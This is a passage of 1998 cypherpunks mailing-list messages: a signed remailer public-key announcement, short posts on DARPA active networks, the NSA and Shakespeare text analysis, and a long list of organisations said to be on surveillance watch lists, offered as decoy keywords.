MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



New mix keys at notatla already in use.
Old ones expire 21Dec1998.


mccain mccain@notatla.demon.co.uk 49894e1cc7629bbb54a3b5f98ba6f6d6 2.0.4b41 MC

- -----Begin Mix Key-----
49894e1cc7629bbb54a3b5f98ba6f6d6
258
AASe8KR46cRA75Jk4YMcE32gpS1uqAveFpRxPVg7
qATY4aPIyVM40QHa/OrHdVc8twmKMNemcdZNCpdb
EDCtaVXLalJ7njbiLs8NMAEVP7WxMQP+1swjvHpR
qP1ikuvy89iNpTbDtl9uf11PNeXiWclrCyFkvS6m
4cXFPskXoa4xWQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----


teatwo teatwo@notatla.demon.co.uk 4568791f20d5e004225c78e04625bca4 2.0.4b41 MC

- -----Begin Mix Key-----
4568791f20d5e004225c78e04625bca4
258
AATVHyCqv2SGgaEbY0HVnBONNsSQwElFCdvSyxhq
cGL4FZ5A1LGBAGNN+aHnfw0X8hvNsFB7EcmBsZ1v
fUt64xRG5gy2+A3rMlad36iZfqrNBKncGh+Y/uEx
nb+hTyANZNlHsUdAfo+lozx0xoB070e6K3rkgxDG
GytOW9VjDTVR3QAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----


-----BEGIN PGP SIGNATURE-----
Version: PGP 5.0i
Charset: noconv

iQA/AwUBNmrcCTROc55Xv6voEQIs4ACeOat7f/0Kn5gLPazrp6rd+gGgsdEAn0nJ
4jhmxQQTvZWFg7d+BxM7WHHR
=pz5z
-----END PGP SIGNATURE-----

--
##############################################################
# Antonomasia   ant@notatla.demon.co.uk                      #
# See http://www.notatla.demon.co.uk/                        #
##############################################################




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 16 Dec 1998 07:43:04 +0800
To: cryptography@c2.net
Subject: DARPA's Active Network page
Message-ID: <v04020a17b29c96c19ac4@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



I saw an article on this in InfoWorld. NAI/TIS and DARPA talking about
putting self-switching packets into the network. I don't see this as too
far off from packets purchasing their passage across the network with
micromoney of some kind.

All spookiness of the current research principals aside, of course...

Cheers,
Robert Hettinga

--- begin forwarded text


Date: Tue, 15 Dec 1998 17:12:39 -0500
To: Digital Bearer Settlement List <dbs@philodox.com>
From: Robert Hettinga <rah@shipwright.com>
Subject: Darpa's Active Network page
Sender: <dbs@philodox.com>
List-Subscribe: <mailto:requests@philodox.com?subject=subscribe%20dbs>

Here's ARPA's Active Network Page: <http://www.darpa.mil/ito/research/anets/>

Cheers,
RAH
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 16 Dec 1998 08:49:41 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: DARPA's Active Network page (fwd)
Message-ID: <199812160006.SAA09381@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 15 Dec 1998 17:50:56 -0500
> From: Robert Hettinga <rah@shipwright.com>
> Subject: DARPA's Active Network page

> I saw an article on this in InfoWorld. NAI/TIS and DARPA talking about
> putting self-switching packets into the network. I don't see this as too
> far off from packets purchasing their passage across the network with
> micromoney of some kind.

How does the packet know what is a good price or a bad price as it makes
each hop? Whose processor is it using to run its program to evaluate the
costs? Who pays for that processor cost on a node that isn't selected? Who
has access to the audit trail? How does a reliable copy get back to the
originator? How does it do this in an anonymous network?


    ____________________________________________________________________

          What raises the standard of living may well diminish the
          quality of life.

                                                 The Club of Rome

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 16 Dec 1998 09:14:43 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: NSA Electronic Sheriff
Message-ID: <199812160043.TAA18739@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



>From a new report:

"Cybercrime, Cyberterrrorism, Cyberwarfare"

Tomorrow's frontline commanders will be drawn from 
the ranks of computer wizards. The sandal culture is 
challenging the wingtips. The National Security Agency's 
(NSA) new electronic sheriff, responsible for protecting 
NSA's ground stations, is a 23-year-old GS-14. In the 
civilian sector, "techies" have moved into senior 
management positions.

   http://jya.com/cyber-trip.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 16 Dec 1998 12:21:11 +0800
To: cypherpunks@cyberpass.net
Subject: Re: First "Crypto Refugee"?
In-Reply-To: <199809040233.TAA29401@netcom13.netcom.com>
Message-ID: <v03130314b29cdad2d976@[209.66.101.206]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:04 AM -0800 12/15/98, tony@secapl.com wrote:
>> the shakespeare analysis seems like a good idea to
>> me. I am not aware of literate papers that try to
>> analyze it with frequency analysis instead of
>> just vague assertions by the authors. there is
>> a huge set of literature that tries to link of
>> the writings of shakespeare to someone else, but
>> as far as I know not much of it is computer analysis.
>
>  This was what brought William Freidman to Riverside, where he both
>created monographs on cryptanalysis and met his wife. (described in detail
>in Kahn.)

And computerized textual analyses of Shakespeare was one of the most
publicized applications of the computers in the 60s. I remember reading
several stories about this then. And I recall an exhibit on the results of
such computerized search, as of around 1968 or so, at the Folger
Shakespeare Library in Washington, D.C. (a class outing).

As when Detweiler or someone proposed this as a "neat thing for Cypherpunks
to do" a couple of years ago, the idea was old before 98% of this list were
born.

Not saying it's not still an interesting research topic, just that it's a
well-established field. And most of the low-hanging fruit has been picked.

--Tim May


Y2K -- LMGALMAO -- Loading my guns and laughing my ass off
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@idt.net>
Date: Wed, 16 Dec 1998 09:30:34 +0800
To: mib <cypherpunks@EINSTEIN.ssz.com
Subject: Re: Throwing Sand into the All-Seeing Eye
In-Reply-To: <259a896938e4522ccd3d711a4d41f7c9@anonymous>
Message-ID: <3.0.1.32.19981215195143.006d7300@pop3.idt.net>
MIME-Version: 1.0
Content-Type: text/plain



At 08:25 AM 12/15/98 -0600, mib wrote:
>
>On Tue, Dec 15, 1998 at 04:02:00AM -0800, Mixmaster wrote:
>> There used to be a web site called "Throwing Sand into the All-Seeing Eye" 
>> which listed a long list of possible NSA-snooper keywords, such as
military 
>> classifications and code words that could be sent for fun across the 
>> Internet for sole purpose of being flagged by the NSA.
>

Here are some more suggestions (I didn't make this list; all of these
supposedly were on watch actual lists of different types----"thanks" to the
police & spook organizations for doing the research)


>
>Act Now; ACT-UP; Action for Animals; Adrian 17; African Students Org./S.F.
>State; African Network; African 
>National Reparations Org.; African People's Socialist Party; African
People's >Solidarity Comm.; African 
>Students Org.; Africans United for Progress; AFSCME Local 3218 (Vice
Pres.); >AFSCME Local 3508; Alexandria 
>Assoc. of Human Rights Advocacy; All Peoples Congress; Alliance for
Philippine >Concerns; Alliance to Stop First 
>Strike; Alliance to Stop Police Abuse; Allied Printing Trades Council;
>Alternative Information Center; 
>Amer-I-Can; American Civil Liberties Union; American Indian Center;
American >Indian Movement; American Indian 
>Student Org.; American Muslim Museum; Americans for Peace Now; Anarchist
>Collective; ANC Meeting; _Ang 
>Katipuan_; Anti-Apartheid Comm./AFSCME; Anti-Militarism Comm.; Anti-Racist
>Action; April 19th Comm. Against 
>Nazis; Arab Baath Socialist Party; Arab Lesbian Network; Armenian National
>Comm.; Armenian Peoples Movement; 
>Arms Control Research Center; Artists and Videomakers Against the War;
Artists >and Writers Out Loud; Artists 
>Television Access; Asian Law Caucus; Audio Archives; Author of Measure J;
>Babylon Burning; Back Country Action 
>Network; Bad Cop/No Donut; Barricada Internacional; Bay Area Anti-Racist
>Action; Bay Area Coalition for Our 
>Reproductive Rights; Bay Area Friends of the Christic Institute; Bay Area
>Jewish Task Force on Cent. Am.; Bay 
>Area Natl. Conf. of Black Lawyers; Bay Area Peace Council; Bay Area Peace
Navy; >Bay Area Reporter; Bay Area 
>Times; Bay Area Vets Against War in Mid. East; Beebee Memorial C.M.E.
Temple; >Ben Linder Construction Brigade; 
>Big Mountain Native People's Support; Bir Zeit Univ. Instructor; Black
>Consciousness Movement of Azania; Black 
>Freedom Fighters Coalition; Black Men United for Change; Black Studies
>Department/S.F. State; Black United 
>Front; Boricuan Popular Army for Puerto Rican Independence; Boycott Coke;
>Boycott Shell Comm.; Breakthrough; 
>Brigada Antonio Maceo; Brothers of African Descent; Bulletin in Defense of
Marxism; 
>Calendar Magazine (Gay); California Voice; Campaign Against Apartheid;
Campus >Peace Comm.; Canadians for 
>Justice in the Middle East; Capp Street Center; Capp Street Foundation;
>Carpenters Local 22; Casa El Salvador; 
>Casa El Salvador Mailing List; Center for Constitutional Rights; Center
for >Democratic Renewal; Center for 
>Investigative Reporting; Center for Middle East Studies; Center for the
Study >of the Americas; Cent. Amer. 
>Research Institute; Chair: Chicano Studies (U.C. Berkeley); Chop
>>Representative Government; Coalition of Black 
>Trade Unionists; Commission of Inquiry; Comm. Against Lockheed D-5; Comm.
for >Academic Freedom in 
>Israeli-Occupied Territories; Comm. for Equality and Justice; Comm. for
Freedom >in Argentina; Comm. for Peace 
>and Democracy in Iran; Comm. for Perm. Israeli-Palestinian Peace; CISPES;
>Cistur; Committee to Free Geronimo 
>Pratt; Comm. to Support the Revolution in Peru; Communist Party U.S.A.;
>Communist Workers Party; Communist 
>Youth Brigade; Community-Labor Coalition for Social & Econ. Justice;
Community >United Against Violence; 
>Continuing the Peace Dialogue; Contra Watch Newsletter; Copwatch; Council
for >the National Interest; Council on 
>Foreign Relations; CounterSpy; Covert Action Information Bulletin; Covert
>Action; Cuba Resource Group; Cuba 
>Information Project; Delta Sigma Beta; Democratic Society of America;
>Democratic Workers Party; Dennis Banks 
>Defense Comm.; Diablo Valley Peace Center; Direct Action Against Racism;
>Doghouse Newsletter; Downside Records; 
>Dykes and Gay Emergency Response; Earth Island Institute; East Bay Women
for >Peace; El Centro de la Raza; El 
>Tecolote; Emergency Coalit. for Palestinian Rights; Emergency Coalition to
End >War; Emergency Comm. to Stop 
>Flag Amendment; Endorser of Proposition W; Fairness and Accuracy in
Reporting; >Fighting Back; Filipino East Bay 
>Network; Filipino Organization Comm.; FMLN-FDR West Coast Representative;
Food >First; Food Not Bombs; Free S.A. 
>Labor Comm.; Freedom for S.A. Refugees Campaign; Freedom for S.A. Refugees
>Center; Freedom Rising Africa 
>Solidarity Comm.; Freedom Road Socialist Org.; Freedom Socialist Party;
Friends >of Nicaragua; Friends of Yesh 
>Gvul; Frontline; Frontline Managing Editor; Gay American Indians; Gay and
>Lesbian Labor Alliance; Global 
>Exchange; Global Options; Green Giant Frozen Food Workers Comm.;
Greenpeace; >Group for the Critical Study of 
>Colonialism; Guardian; Guatemala News and Information Bureau; Harvey Milk
Club; >Hotel and Restaurant Employees 
>Local 2; ILWU Local 6, President; ILWU Local 10; INCAR; In These Times;
>Independent Grocers Assn.; Info. 
>Network Against War and Fascism; Information Services on Latin America;
>Instituto del Pueblo; Interfaith Center 
>on Corporate Accountability; Interfaith Task Force on Cent. Amer.;
>Inter-Hemispheric Education Resource Ctr.; 
>Intl. Campaign to Free Geronimo Pratt; Internatl. Comm. Against Racism;
>Internatl. Indian Treaty Council; 
>Internatl. Jewish Peace Union; Internatl. League for Human Rights/N. Amer.
>Chapter; Internatl. Socialist Org.; 
>Internationalist Workers Party; Irish National Aid; Irish Northern Aid;
Irish >Republican Socialist Comm.; 
>Israeli Foreign Affairs; Israelis Against Occupation; Japanese-American
>Citizens League; Jewish Comm. on the 
>Middle East; John Brown Anti-Klan Comm.; KPOO Radio; KQED-TV Board of
Directors; KUNA; 
>Labor Comm. on the Middle East; Labor for Peace; Labor Video; LAGAL; La
Raza >Coalition of Berkeley; La Raza 
>Unida; Latin American Support Comm.; Lavender Mafia; Lawyers Comm. on
Cent. >Amer.; League of Filipino Students; 
>Leonard Peltier Alliance Group; Lesbian Agenda for Action; Lesbians and
Gays >Against Intervention; Liberation 
>Support Movement; Libros Sin Fronteras; Line Of March; L.A. Coalition
Against >Intervention in the Middle East; 
>L.A. Observer; L.A. Student Coalition; 
>MADRE; Malcolm X Grassroots Movement; Mandela Reception Comm.; Maoist
>Internationalist Movement; Marazul
>Tours; Mariposa Peace Network; Marxist-Leninist Party; Media Review;
Middle >East Children's Alliance; Middle 
>East Comm. for National Conference of Black Lawyers; Middle East Peace
Network; >Midwest Labor Institute; 
>Mobilization Support Group; Modern Times Bookstore; Mother Jones;
Movimiento de >Agrupacion Popular; Movimiento 
>Estudiantil Chicano; 
>NABET Local 51/Executive Board; NALC Local 14; National Alliance of Third
World >Journalists; NAACP; National 
>Call to Action; Natl. Coalition of Black Lesbians and Gays; Natl. Comm.
Against >Repressive Legislation; 
>National Conference of Black Lawyers; National Forum of S.A.; National
Midweek; >National Org. of African 
>Students in N. Am.; National Rainbow Coalition; National Response
Comm./NBAU; >National Student Cent. Am. Action 
>Network; National Student Lobby; National Union of Farmers; Network of
>Arab-American Students; Network in 
>Solidarity with Chile; New Afrikan Peoples Org.; New Alliance Newspaper;
New >Alliance Party; New Americas 
>Press; New Jewish Agenda; New Movement in Solidarity with Puerto Rican
>Independentistas; Nicaragua Cultural 
>Center; Nicaragua Information Center; Nicaragua Information Center
Bulletin; >Nicaragua Interfaith Comm. Action; 
>Nicaragua Network News; No Apologies/No Regrets; No Business As Usual; No
>Justice, No Peace; North Bay 
>Anti-Racist Action; North Star; Northern California Ecumenical Council;
Now >Magazine, Toronto (Canada); 
>Nuremberg Action; Oakland Education Association; O.C. Coalition for Peace
in >the Middle East; OCAW; OCAW Local 
>8149; October 6 Justice Project; Oregon Philippines Concerns Comm.; Out of
>Control Comm.; Outrage; 
>Pacifica Foundation; Pakistan Democratic Comm.; Pan African Movement of
the >U.S.; Partido Socialista Chileno; 
>Partido Socialista Puertorriqueno; Partisan Defense Comm.; Patrice Lumumba
>Coalition; Paul Robeson Friendship 
>Society; Peace and Conflict Studies; Peace and Freedom Comm.; Peace and
Freedom >Party; Peace and Justice Comm. 
>- School Board; Peace and Solidarity Alliance; Peace and Solidarity Comm.;
>Peace Cafe; Peace Research Center;
>People Against Racist Terror; Peoples Anti-War Mobilization; Peoples
>Architecture Collective; Peoples Law 
>Office; Peoples Park; Peoples Video; Peoples World; Pershing Plowshares;
>Philippine Organizing Comm.; 
>Philippine Resource Center; Philippines Human Rights Lobby; Pledge of
>Resistance; Plumbers and Fitters Local 
>393; Portland Cent. Am. Solidarity Comm.; Prison News Service; Project
Impact; >Project National Interest; 
>Public Eye; 
>Queer Nation; Quinn Defense; Radical Film Collective; Radical Women;
Rainbow >Coalition; Rainbow Lobby; Refuse 
>and Resist; Republic of New Afrika; Revolutionary Books; Revolutionary
>Communist Party; Revolutionary Communist 
>Youth Brigade; Revolutionary Worker; Revolutionary Workers League;
Richmond >Education Assn.; Roots Against War; 
>San Fernando Valley Peace Coalition; San Francisco Bay Guardian; S.F.
Coalition >of Labor Union Women; S.F. 
>Labor Council/AFL-CIO; San Francisco Sentinel; S.F. Univ. Labor Studies;
San >Francisco Weekly; S.F. Women for 
>Peace; SANE/FREEZE; Sardaraba; Science for Nicaragua; SEIU Local 535; SEIU
>Local 616; Serbian Unity Congress; 
>Shell Boycott Comm.; Simon Wiesenthal Center; Sister City Assn; Socialist
>Action; Socialist Party Political 
>Org.; Socialist Workers Party; Society of In'Ash El-U.S.A.; SOHRI Study
Group >(U.C. Berkeley); Solidarity; S.A. 
>Forum; S.A. Freedom Through Education Foundation; S.A. Internatl. Student
>Congress; South African Workers Org.; 
>South Bay Nicaragua Solidarity Comm.; So. African Liberation Support
Comm.; >Southern African Media Center; 
>Spartacus Youth League; Spartacist League; Stevens, Hinds & White,
Attorneys; >Stop the U.S. War Machine Action 
>Network; Student Cltn. Against Apartheid and Racism; Student Pugwash;
Students >Against Intervention; Students 
>Against Intervention in Cent. Am.; Students for Peace in the Persian Gulf;
>SWAPO; SWAPO Meeting; 
>Tass News Agency; Teamsters Local 921, S.F. Teamsters for a Democratic
Union; >Technica; The Black Scholar; The
>Data Center; The Dazen-I Foundation; The Irishman; The Nuclear Resister;
Third >World Resources; Toronto
>Anti-Intervention Coalition; Trustee, IAM Local 565 (Sunnyvale); 
>Ubiquitous; Unified Against Genocide; Union del Barrio; Union of
Democratic >Filipinos; Union Publications; 
>United Auto Workers; United Auto Workers, Local 119; United Colors; United
Farm >Workers; United Front Against 
>Fascism; U.S. Anti-Apartheid Newsletter; U.S. China Review; U.S. Comm. for
>Friendship with the GDR; U.S.-Cuba 
>Labor Exchange; U.S.-Grenada Friendship Society; U.S. Out of S.A. Network;
U.S. >Peace Council; U.S.-USSR 
>Friendship Society of S.F.; U.S.A. Movement Banning Apartheid; Univ. of
Calif., >Berkeley; UTU Local 1730; 
>Vanguard Public Foundation; Venceremos Brigade; Vietnam Veterans Action;
>Vietnam News Agency; Villa Zapata
>Workers Comm.; Voice of the Uprising; 
>Washington Office on Africa; WBAI-FM (Pacifica Foundation) New York;
Weatherman >Underground; Witness for S.A.;
>Woman, Inc.; Women Against U.S. Intervention; Women in Black; Women of
Color >Coalition Center; Women of Color
>Resource Project; Women's Intl. League for Peace and Freedom; Workers
World Party; 
>Yes on W Comm.; Young Koreans United; Young Koreans United of S.F. 
>Arab-American Democratic Club; Arab Book Center; Arab People's Coalition;
Arab >Relief Fund of Lebanon; Arab
>Studies Quarterly/Middle East Research and Information Project; Arab-
American >Univ. Graduates; Arabic Book 
>Center; Bethlehem Assn.; Black Muslims; Comm. for a Democratic Palestine;
Comm. >of Correspondence; Council of 
>Arab-American Orgs.; Dem. Front for the Liberation of Palestine;
Democratic >Palestinian Youth; Department of 
>Near Eastern Studies; El Fatah; Family Sponsorship Project; General Union
of >Palestinian Students; 
>Inst. of African-American Studies; Iranian Students Assn.; Iraqi
Intelligence >Officer; Islamic Jihad; Islamic 
>Society of Orange County; Israeli Civil Right Assn.; JIFNA Association;
>Khilafah; Law in the Service of Man; 
>Masjid Al-Islam; Masqid Al-Saff Mosque; Middle East Justice Network;
Muslim >Mutadhakkirun Assn.; Muslim 
>Students Assn.; Muslim Students Union; Nation of Islam; National Assn. of
>Arab-Americans; National Lawyers 
>Guild; November 29th Comm.; Occupied Land Fund; Palestine American Youth;
>Palestine Arab Club; Palestine Arab 
>Fund; Palestine Democratic Youth Org.; Palestine Human Rights Campaign;
>Palestine Solidarity Comm.; Palestine 
>Women's Org.; Popular Front for the Liberation of Palestine; Progressive
Muslim >Alliance; Sacred House of 
>Islam; Union of Palestinian Women's Association; ANC A Movement Banning
>Apartheid; African National Congress; 
>All African Peoples Revolutionary Party; All-African Student Conference;
>Alternative Education (RSA) (SACHED); 
>Anglican Church Bd. of Social Responsibility; Anti-Apartheid Comm.; Anti-
>Apartheid L.A.; Apartheid Boycott 
>Campaign; Art Against Apartheid; Artists Against Apartheid; Bay Area Free
S.A. >Movement; Berkeley 
>Anti-Apartheid Network; Canicor Research/S.A. Forum; Democratic Socialists
of >America; Dennis Brutus Defense 
>Comm.; Evangelical Lutheran Church/S.A.; Free Moses Mayekiso Committee;
>Journalist LA Times (in S.A.); 
>National Namibia Concerns; Pan African Congress; Pan Africanist Congress;
>Pan-Africa Congress of Azania; 
>Prairie Fire Organizing Comm.; S.A. Ecumenical Task Force; S.F.
Anti-Apartheid >Comm.; South African Student 
>Congress; Southern Africa Media Center; Univ. of Calif. Divestment Coalition

Here's some keywords to get you started:



Act Now; ACT-UP; Action for Animals; Adrian 17; African Students
Org./S.F. State; African Network; African 
National Reparations Org.; African People's Socialist Party; African
People's Solidarity Comm.; African 
Students Org.; Africans United for Progress; AFSCME Local 3218 (Vice
Pres.); AFSCME Local 3508; Alexandria 
Assoc. of Human Rights Advocacy; All Peoples Congress; Alliance for
Philippine Concerns; Alliance to Stop First 
Strike; Alliance to Stop Police Abuse; Allied Printing Trades
Council; Alternative Information Center; 
Amer-I-Can; American Civil Liberties Union; American Indian Center;
American Indian Movement; American Indian 
Student Org.; American Muslim Museum; Americans for Peace Now;
Anarchist Collective; ANC Meeting; _Ang 
Katipuan_; Anti-Apartheid Comm./AFSCME; Anti-Militarism Comm.;
Anti-Racist Action; April 19th Comm. Against 
Nazis; Arab Baath Socialist Party; Arab Lesbian Network; Armenian
National Comm.; Armenian Peoples Movement; 
Arms Control Research Center; Artists and Videomakers Against the
War; Artists and Writers Out Loud; Artists 
Television Access; Asian Law Caucus; Audio Archives; Author of
Measure J; Babylon Burning; Back Country Action 
Network; Bad Cop/No Donut; Barricada Internacional; Bay Area
Anti-Racist Action; Bay Area Coalition for Our 
Reproductive Rights; Bay Area Friends of the Christic Institute; Bay
Area Jewish Task Force on Cent. Am.; Bay 
Area Natl. Conf. of Black Lawyers; Bay Area Peace Council; Bay Area
Peace Navy; Bay Area Reporter; Bay Area 
Times; Bay Area Vets Against War in Mid. East; Beebee Memorial
C.M.E. Temple; Ben Linder Construction Brigade; 
Big Mountain Native People's Support; Bir Zeit Univ. Instructor;
Black Consciousness Movement of Azania; Black 
Freedom Fighters Coalition; Black Men United for Change; Black
Studies Department/S.F. State; Black United 
Front; Boricuan Popular Army for Puerto Rican Independence; Boycott
Coke; Boycott Shell Comm.; Breakthrough; 
Brigada Antonio Maceo; Brothers of African Descent; Bulletin in
Defense of Marxism; 
Calendar Magazine (Gay); California Voice; Campaign Against
Apartheid; Campus Peace Comm.; Canadians for 
Justice in the Middle East; Capp Street Center; Capp Street
Foundation; Carpenters Local 22; Casa El Salvador; 
Casa El Salvador Mailing List; Center for Constitutional Rights;
Center for Democratic Renewal; Center for 
Investigative Reporting; Center for Middle East Studies; Center for
the Study of the Americas; Cent. Amer. 
Research Institute; Chair: Chicano Studies (U.C. Berkeley); Chop
>Representative Government; Coalition of Black 
Trade Unionists; Commission of Inquiry; Comm. Against Lockheed D-5;
Comm. for Academic Freedom in 
Israeli-Occupied Territories; Comm. for Equality and Justice; Comm.
for Freedom in Argentina; Comm. for Peace 
and Democracy in Iran; Comm. for Perm. Israeli-Palestinian Peace;
CISPES; Cistur; Committee to Free Geronimo 
Pratt; Comm. to Support the Revolution in Peru; Communist Party
U.S.A.; Communist Workers Party; Communist 
Youth Brigade; Community-Labor Coalition for Social & Econ. Justice;
Community United Against Violence; 
Continuing the Peace Dialogue; Contra Watch Newsletter; Copwatch;
Council for the National Interest; Council on 
Foreign Relations; CounterSpy; Covert Action Information Bulletin;
Covert Action; Cuba Resource Group; Cuba 
Information Project; Delta Sigma Beta; Democratic Society of
America; Democratic Workers Party; Dennis Banks 
Defense Comm.; Diablo Valley Peace Center; Direct Action Against
Racism; Doghouse Newsletter; Downside Records; 
Dykes and Gay Emergency Response; Earth Island Institute; East Bay
Women for Peace; El Centro de la Raza; El 
Tecolote; Emergency Coalit. for Palestinian Rights; Emergency
Coalition to End War; Emergency Comm. to Stop 
Flag Amendment; Endorser of Proposition W; Fairness and Accuracy in
Reporting; Fighting Back; Filipino East Bay 
Network; Filipino Organization Comm.; FMLN-FDR West Coast
Representative; Food First; Food Not Bombs; Free S.A. 
Labor Comm.; Freedom for S.A. Refugees Campaign; Freedom for S.A.
Refugees Center; Freedom Rising Africa 
Solidarity Comm.; Freedom Road Socialist Org.; Freedom Socialist
Party; Friends of Nicaragua; Friends of Yesh 
Gvul; Frontline; Frontline Managing Editor; Gay American Indians;
Gay and Lesbian Labor Alliance; Global 
Exchange; Global Options; Green Giant Frozen Food Workers Comm.;
Greenpeace; Group for the Critical Study of 
Colonialism; Guardian; Guatemala News and Information Bureau; Harvey
Milk Club; Hotel and Restaurant Employees 
Local 2; ILWU Local 6, President; ILWU Local 10; INCAR; In These
Times; Independent Grocers Assn.; Info. 
Network Against War and Fascism; Information Services on Latin
America; Instituto del Pueblo; Interfaith Center 
on Corporate Accountability; Interfaith Task Force on Cent. Amer.;
Inter-Hemispheric Education Resource Ctr.; 
Intl. Campaign to Free Geronimo Pratt; Internatl. Comm. Against
Racism; Internatl. Indian Treaty Council; 
Internatl. Jewish Peace Union; Internatl. League for Human Rights/N.
Amer. Chapter; Internatl. Socialist Org.; 
Internationalist Workers Party; Irish National Aid; Irish Northern
Aid; Irish Republican Socialist Comm.; 
Israeli Foreign Affairs; Israelis Against Occupation;
Japanese-American Citizens League; Jewish Comm. on the 
Middle East; John Brown Anti-Klan Comm.; KPOO Radio; KQED-TV Board
of Directors; KUNA; 
Labor Comm. on the Middle East; Labor for Peace; Labor Video; LAGAL;
La Raza Coalition of Berkeley; La Raza 
Unida; Latin American Support Comm.; Lavender Mafia; Lawyers Comm.
on Cent. Amer.; League of Filipino Students; 
Leonard Peltier Alliance Group; Lesbian Agenda for Action; Lesbians
and Gays Against Intervention; Liberation 
Support Movement; Libros Sin Fronteras; Line Of March; L.A.
Coalition Against Intervention in the Middle East; 
L.A. Observer; L.A. Student Coalition; 
MADRE; Malcolm X Grassroots Movement; Mandela Reception Comm.;
Maoist Internationalist Movement; Marazul
Tours; Mariposa Peace Network; Marxist-Leninist Party; Media Review;
Middle East Children's Alliance; Middle 
East Comm. for National Conference of Black Lawyers; Middle East
Peace Network; Midwest Labor Institute; 
Mobilization Support Group; Modern Times Bookstore; Mother Jones;
Movimiento de Agrupacion Popular; Movimiento 
Estudiantil Chicano; 
NABET Local 51/Executive Board; NALC Local 14; National Alliance of
Third World Journalists; NAACP; National 
Call to Action; Natl. Coalition of Black Lesbians and Gays; Natl.
Comm. Against Repressive Legislation; 
National Conference of Black Lawyers; National Forum of S.A.;
National Midweek; National Org. of African 
Students in N. Am.; National Rainbow Coalition; National Response
Comm./NBAU; National Student Cent. Am. Action 
Network; National Student Lobby; National Union of Farmers; Network
of Arab-American Students; Network in 
Solidarity with Chile; New Afrikan Peoples Org.; New Alliance
Newspaper; New Alliance Party; New Americas 
Press; New Jewish Agenda; New Movement in Solidarity with Puerto
Rican Independentistas; Nicaragua Cultural 
Center; Nicaragua Information Center; Nicaragua Information Center
Bulletin; Nicaragua Interfaith Comm. Action; 
Nicaragua Network News; No Apologies/No Regrets; No Business As
Usual; No Justice, No Peace; North Bay 
Anti-Racist Action; North Star; Northern California Ecumenical
Council; Now Magazine, Toronto (Canada); 
Nuremberg Action; Oakland Education Association; O.C. Coalition for
Peace in the Middle East; OCAW; OCAW Local 
8149; October 6 Justice Project; Oregon Philippines Concerns Comm.;
Out of Control Comm.; Outrage; 
Pacifica Foundation; Pakistan Democratic Comm.; Pan African Movement
of the U.S.; Partido Socialista Chileno; 
Partido Socialista Puertorriqueno; Partisan Defense Comm.; Patrice
Lumumba Coalition; Paul Robeson Friendship 
Society; Peace and Conflict Studies; Peace and Freedom Comm.; Peace
and Freedom Party; Peace and Justice Comm. 
- School Board; Peace and Solidarity Alliance; Peace and Solidarity
Comm.; Peace Cafe; Peace Research Center;
People Against Racist Terror; Peoples Anti-War Mobilization; Peoples
Architecture Collective; Peoples Law 
Office; Peoples Park; Peoples Video; Peoples World; Pershing
Plowshares; Philippine Organizing Comm.; 
Philippine Resource Center; Philippines Human Rights Lobby; Pledge
of Resistance; Plumbers and Fitters Local 
393; Portland Cent. Am. Solidarity Comm.; Prison News Service;
Project Impact; Project National Interest; 
Public Eye; 
Queer Nation; Quinn Defense; Radical Film Collective; Radical Women;
Rainbow Coalition; Rainbow Lobby; Refuse 
and Resist; Republic of New Afrika; Revolutionary Books;
Revolutionary Communist Party; Revolutionary Communist 
Youth Brigade; Revolutionary Worker; Revolutionary Workers League;
Richmond Education Assn.; Roots Against War; 
San Fernando Valley Peace Coalition; San Francisco Bay Guardian;
S.F. Coalition of Labor Union Women; S.F. 
Labor Council/AFL-CIO; San Francisco Sentinel; S.F. Univ. Labor
Studies; San Francisco Weekly; S.F. Women for 
Peace; SANE/FREEZE; Sardaraba; Science for Nicaragua; SEIU Local
